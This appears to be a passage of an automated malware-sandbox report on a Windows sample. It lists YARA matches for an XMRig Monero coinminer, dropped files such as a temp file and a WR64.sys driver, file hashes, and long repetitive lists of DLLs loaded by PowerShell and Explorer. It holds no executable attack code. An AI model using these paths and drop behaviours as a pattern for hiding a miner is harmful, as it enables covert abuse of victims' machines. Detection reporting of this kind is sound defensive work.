                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: Process Memory Space: m.exe PID: 2724, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B2973F40 NtCreateUserProcess,10_2_00007FF6B2973F40
                Source: C:\Program Files\MINA\m.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to behavior
                Source: C:\Program Files\MINA\m.exeFile deleted: C:\Windows\Temp\wbiwcikhpmwr.tmpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F352FA2_2_00007FF848F352FA
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B29885D010_2_00007FF6B29885D0
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B29771A010_2_00007FF6B29771A0
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B2983DF010_2_00007FF6B2983DF0
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B2986D9010_2_00007FF6B2986D90
                Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\wbiwcikhpmwr.tmp 78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF6B2973F40 appears 34 times
                Source: m.exe.0.drStatic PE information: Number of sections : 11 > 10
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: Number of sections : 11 > 10
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
